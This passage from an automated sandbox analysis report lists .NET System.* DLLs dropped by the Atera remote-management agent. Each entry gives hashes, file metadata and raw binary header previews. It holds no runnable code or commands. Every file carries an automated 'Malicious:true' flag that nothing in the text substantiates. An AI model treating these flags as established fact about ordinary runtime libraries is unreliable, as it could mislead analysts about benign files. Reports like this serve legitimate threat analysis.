                                                                                                                                                                                                                                        SSDEEP:384:9cDagtDApWSKJWVNyb8E9VF6IYinAM+oC4LsTaZ:9PKBCEpYinAMxCN0
                                                                                                                                                                                                                                        MD5:512AC7623AABFF8A9D4860878E944A5F
                                                                                                                                                                                                                                        SHA1:969E6FF8030C7A194E758734815FFF3BD744B90F
                                                                                                                                                                                                                                        SHA-256:15C9AA816AB590B201C6A70F9C63D09D0FB93AF486CDBE34A22FD0887BDBBF61
                                                                                                                                                                                                                                        SHA-512:798C40542F48E2E6ECB6081195C0F29DAD4819B175DBF77A88AAF11FAE24CE5F9B7814CF4BC9726F8516ECEF80E7068C8347C58DF501F53F23D74916524CF3CF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............+... ...@....... .............................."#....@.................................0+..O....@..................0(...`.......)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d+......H.......P ..(...................x)......................................BSJB............v4.0.30319......l...x...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................x.........w.o.....o.....\...............<.....Y.................................................G...........V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C./...K.O...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8584780983893845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:36NxhqWD4W52ANyby2sE9jBF6IYiYF8pA5K+oCGUHFAybofr39Sg:WIWD4W3Nyb8E9VF6IYinAM+oCM0utSg
                                                                                                                                                                                                                                        MD5:8268E10BCD931ADB25F1265C995B2B21
                                                                                                                                                                                                                                        SHA1:64F747428A330BE19B1C247B983A00068F1A84A8
                                                                                                                                                                                                                                        SHA-256:FC4AF82A198EFA9D428207EE8826AB1E12761DCEE197AF96D6D3DB114D678EF1
                                                                                                                                                                                                                                        SHA-512:A87831A26504361BCC99B560BB8ED92D10EF59A00D7340008261D347F24A2D9A51406F4F79C5B621CB3CED0642A6492A45C86D8716CCE0F3F8B3B5CCE8DC6D19
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..@...............0(...`......\'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....d.......#US.h.......#GUID...x.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.784561632206215
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:nMWzQWONyb8E9VF6IYinAM+oCN/JuuNo2:n54EpYinAMxCpjr
                                                                                                                                                                                                                                        MD5:F09E04510F68204A1B0418275FA4D7B5
                                                                                                                                                                                                                                        SHA1:B6199887CC182AE07F32B8A92019C6C2F8A831C6
                                                                                                                                                                                                                                        SHA-256:876ADF0593EDB181E39460FDB241A8CF3811D7D6212D756F54777D4AA942430F
                                                                                                                                                                                                                                        SHA-512:ED15F2376F9E660160269AC49F20EE5D973A86FA89933DEF4CCD9119EC0F672D280440BF813D9D2E137567DF5D9237831B33165E82DF3A214D912E57C72C239F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............N*... ...@....... ...............................{....@..................................)..O....@..@...............0(...`.......(............................................... ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B................0*......H.......P ......................D(......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................z.....N.....:.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.724764212651807
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:GxDHKWAMWeNyb8E9VF6IYinAM+oClPKZ0q:CD8wEpYinAMxCV5q
                                                                                                                                                                                                                                        MD5:9ED9C29955557937255E94A482605EA4
                                                                                                                                                                                                                                        SHA1:4EC708B0302AF71315D8989826F14133A937661B
                                                                                                                                                                                                                                        SHA-256:48D6284929C1A756E1CA6568E1264F68D364A26D2783FFD102178C3CEE5C3E2F
                                                                                                                                                                                                                                        SHA-512:CFFF96564678592E36034DE8A93B10573D04281811EE475CE2FCBE38B508F196A42C5B27AE9995BFD78100D7B8ACF9B583371384D30B0F55997761F62DB26BB3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ...............................2....@................................. ,..O....@..................0(...`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID...........#Blob......................3................................"...............1.............{.................................Q.....j.......................n...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8301399451137295
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ELNBEW6pWpNyb8E9VF6IYinAM+oCdT1qe/9:EbMmEpYinAMxCpV
                                                                                                                                                                                                                                        MD5:887B9CC90D56BAEDD52833D1A1F6CD8A
                                                                                                                                                                                                                                        SHA1:208172E072C9BDEF30B09FD3B709F096C62F4EB0
                                                                                                                                                                                                                                        SHA-256:2664564C71CB9325575F6AD8E05E9A6610872B6BD8EE8A5E652CDAA155E9D9A5
                                                                                                                                                                                                                                        SHA-512:2D7B18B8BE784891609A841C9418D2D4D94C48B0FF39DD462D6864BD13DDCEC99BE275F2181D9009562DB5B79681A3244AEBDD31ED49882DC55BEDBE9B71B8EF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................D(..O....@..................0(...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.886407406057073
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:UKkHKW/tW7Nyb8E9VF6IYinAM+oCkNKuTLO5:ZuMEpYinAMxCWly
                                                                                                                                                                                                                                        MD5:BDE33E56BCFDA5F43F698AA6A9904801
                                                                                                                                                                                                                                        SHA1:C862C96ABCABA6293A559C69359580A499C8FB49
                                                                                                                                                                                                                                        SHA-256:05B3A962728FE408F645C0E346BA2C67C05D580019F46E8EA125F11625492AD4
                                                                                                                                                                                                                                        SHA-512:83D178FEF3FFA4E0E2F12E4D27CC41CD7558D80E866FB6157F6E01D8BFEFFC02AD9E49A60825E185DA1451AD98B3EF715AE56BEB2FD1A7436CE6FCFFB5B1DE40
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................\....@..................................(..O....@..`...............0(...`.......'............................................... ............... ..H............text...4.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................$'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................W.....W...R.D.........f.......................=.....V.....}...........q.........................>.....>.....>...).>...1.>...9.>...A.>...I.>...Q.>...Y.>...a.>...i.>...q.>.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.831123937891827
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:uLnfIWqrW2Nyb8E9VF6IYinAM+oC7Dq1bsmtw:uDf47EpYinAMxCgbne
                                                                                                                                                                                                                                        MD5:FC6F9DD2EDADE4B03B2C286FF12B08B8
                                                                                                                                                                                                                                        SHA1:881DFD7874EADD9CD9BBB2D00D565C4C4B67DC74
                                                                                                                                                                                                                                        SHA-256:B71BA90138E82175AB84E24BC1D1562B384E42E66211C3AB9E55DE37AE66806E
                                                                                                                                                                                                                                        SHA-512:1AD27E085FA82B2903ADD0A272957922676EA010E7951A263839044A64156ED1FEF0DDDF4BBCB64A90673C46D36CBF8293D4CC95F79DF9042361427798AEC185
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................D(..O....@..................0(...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.674385262775769
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:bh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBzX:by9eEpYinAMxCAr
                                                                                                                                                                                                                                        MD5:DD413B5255E4B7837A55CAEB31F2D3B5
                                                                                                                                                                                                                                        SHA1:08A3E4FC618C547BC0C43C14A82751EDD1FE5EAE
                                                                                                                                                                                                                                        SHA-256:25F0B340874F87F64471DCBF1F0C5D55AF3138BA38962428F4E43C8B0AC62FDD
                                                                                                                                                                                                                                        SHA-512:41CC3F323C9BD2B4021C6742145C816D899360FD2D0C34737F8AC59C5ABD5A9CEB940FAD5AB60CF2A82B27F508F59AB87D675031ECE88A9AEFAF422B03A0557F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ..............................f.....@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.814530079881458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:kZhbRtxWl8WK1W5D1Nyby2sE9jBF6IYiYF8pA5K+oCGUHF8x/6DpR3ugz:wna8WK1WTNyb8E9VF6IYinAM+oCY4Nlz
                                                                                                                                                                                                                                        MD5:C10CBA5C00EFECB544EDFD0347F342DA
                                                                                                                                                                                                                                        SHA1:D3D31C92D0D57121BEAB9141CF25B7CEE687837A
                                                                                                                                                                                                                                        SHA-256:B250173E08828C52BC38D0EAA026D1A4DA1B3188D78A00A70C766231551415CC
                                                                                                                                                                                                                                        SHA-512:6E45217D2BA25629A40C428C9F9A96F46EDBBB49AAEC4FB99BEAE7B34F15484DDBE25F117F8576EB6E99CF27BDF4A9A0385A359B8E0674263E8EE9C2B6CECDA9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............j*... ...@....... ..............................,.....@..................................*..O....@..................0(...`.......(............................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................L*......H.......P ......................`(......................................BSJB............v4.0.30319......l...@...#~......0...#Strings............#US.........#GUID....... ...#Blob......................3................................................w.................!...........<.....Y.............................................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.765575981977114
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:23ZxCaSWITW5GANyby2sE9jBF6IYiYF8pA5K+oCGUHFjmR6EzqgOr:eBSWITWjNyb8E9VF6IYinAM+oC3mR62A
                                                                                                                                                                                                                                        MD5:59D3A3CDAD08B9FD49D10F1147F0C9F2
                                                                                                                                                                                                                                        SHA1:3BACA7DC1A41DE65DFCD70BCA4AAE653FEDD49AA
                                                                                                                                                                                                                                        SHA-256:9581777360F16E3E7FAA761BE92F9A433B1B4FA2932721D77742830D3ED782E3
                                                                                                                                                                                                                                        SHA-512:77513217DC2E3F177F8B3A51E820D33D9BEDF2CB4D0E101C128ED3942C46460762B6F770AC11CF166872A429DA2A1428AAA12419B8537E24C261CD66224B748E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............*... ...@....... ....................................@..................................)..O....@.. ...............0(...`.......(............................................... ............... ..H............text...$.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................|.....|...S.i.........g.................f...........5.....~...........P.....9...................c.....c.....c...).c...1.c...9.c...A.c...I.c...Q.c...Y.c...a.c...i.c...q.c.......................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.874843424486405
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:b88cIIWNoWINyb8E9VF6IYinAM+oCJ7+iB:b9cUeEpYinAMxCQiB
                                                                                                                                                                                                                                        MD5:F6B70B3A89CDD11AD42B8CC1C5545D4C
                                                                                                                                                                                                                                        SHA1:32CE65D07ADD6C3559E254FE6D832AFDCF179947
                                                                                                                                                                                                                                        SHA-256:1513AEC438FEE64607C23AE94F0038C6473B7E7D067742C7ED081B9C59546498
                                                                                                                                                                                                                                        SHA-512:41F76E1E312879FD46D20B2088AF9471BEE791040506F6730AC34B0E5027824EDA3DB883169B2780A42CE147B6C51F0FE820598B264C7A6960D2B1C0BD0D152E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............V)... ...@....... ..............................'.....@..................................)..O....@..................0(...`.......'............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8)......H.......P ......................L'......................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID...........#Blob......................3..................................................*.....*...c.....J.....w.................v.....,.....E.................`.....I...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22576
                                                                                                                                                                                                                                        Entropy (8bit):6.619214553486053
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:NkUwx9rm5go1fWKmmW4oqN5dWjaWxNyb8E9VF6IYinAM+oCowXWyVCN:srmoFmWXX5EpYinAMxCb1VCN
                                                                                                                                                                                                                                        MD5:09C9132E894DDC5ED179A5011EE7A321
                                                                                                                                                                                                                                        SHA1:8CC4C0EB42167510E9A09E1DF4D4DA89D9849B1A
                                                                                                                                                                                                                                        SHA-256:9322EF78F8B8A2964BEBEF2B394BAF81F841C32A2B3784A4847F90C05A3D7D70
                                                                                                                                                                                                                                        SHA-512:C781CC33DFC1D58A1C50ABDEA3646988729E13E01E3FF41E5768114AAC2E73FFC78D96DCB1E3B459B2586050367C593455999C47E0C654E835AA5D4D8CECEFFF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..&...........E... ...`....... ..............................q.....@.................................PE..O....`..x............0..0(...........D............................................... ............... ..H............text....%... ...&.................. ..`.rsrc...x....`.......(..............@..@.reloc..............................@..B.................E......H........$...............A.......C......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r/..p.(....*......(....*2(.....(....*^~....-.(.........~....*.0..........~..........(.........(....-Y..(!....{/......5..,

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18480
                                                                                                                                                                                                                                        Entropy (8bit):6.676903361742476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:C09bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVs9:zOAghbsDCyVnVc3p/i2fBVlAO/BRU+pb
                                                                                                                                                                                                                                        MD5:5733180EB9E098285CEE5A61DA3CE521
                                                                                                                                                                                                                                        SHA1:C2642C210299A1658ECF9AD34E78727444AD0737
                                                                                                                                                                                                                                        SHA-256:8C7057258867681EE6D758344DDDEBB90D6158C6391BCDC60BD6F69E43840DBB
                                                                                                                                                                                                                                        SHA-512:7C7103E40AE8D8919C3E38C9E9A9E603BFEFFEFB3B8F3B62E7363C87D54DD1F0872081675F6F2B964C4B83F95F3D9C4B8147B7201678B1B3124E2E8182FA8E7B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............r5... ...@....... ..............................;.....@................................. 5..O....@..P............ ..0(...`.......3............................................... ............... ..H............text...x.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B................T5......H.......P ......................h3......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................r.....................e...........4.................3.....L...................................R...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.832794165567168
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cvYx4AW6RW524Nyby2sE9jBF6IYiYF8pA5K+oCGUHFt7kRCcmNEa:d7W6RWLNyb8E9VF6IYinAM+oCZ7KmKa
                                                                                                                                                                                                                                        MD5:94E2C828C78B45461F60515EE9F67A0B
                                                                                                                                                                                                                                        SHA1:F7B4FE01F0D15D8A5EDC3FFA5B02969C88D1F189
                                                                                                                                                                                                                                        SHA-256:9FB8C2C852DA4057D918FAEE59C8566539917E4CA3F82DD4BCD7E9E4CD4E26DF
                                                                                                                                                                                                                                        SHA-512:5F7C71B8D8BFE07F8768E97984DA6003008649029B847E073AFD7B634680D7C616F6BBFA57DE81C258D91552984B997D74BCF35C44CB30E26E3FB88F3B07F3CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................u.....@.................................T(..O....@..................0(...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......4...#Strings....(.......#US.,.......#GUID...<.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.923637390083461
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:yI5HeWFwTBsW9Nyb8E9VF6IYinAM+oCuKOyZrWC:yI5HFwTB3EpYinAMxClV7
                                                                                                                                                                                                                                        MD5:33B09F21BE9B7B2D76BE2DD9FDC3188C
                                                                                                                                                                                                                                        SHA1:89DCFF4E98D10BAD8979C542C83B83B40D33ABFB
                                                                                                                                                                                                                                        SHA-256:5B8BFAC3CE90845E121DE2F1271AF56B596E361741FA882626CF900017E850F0
                                                                                                                                                                                                                                        SHA-512:6494B24F192C680FEA9ED2CFA551D515BE391BCB4E149F0FA5607F6A819A0214586ABB376843F70199F08D19C67D8D35411AC6500D5FB51349E10D9AC51D1A38
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ...............................o....@.................................|)..O....@..................0(...`......D(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ..t....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....@.......#US.D.......#GUID...T... ...#Blob......................3............................................................U.x...........................~.....4.....M.................h.....$...................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r...a.r...i.r...q.r.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dll

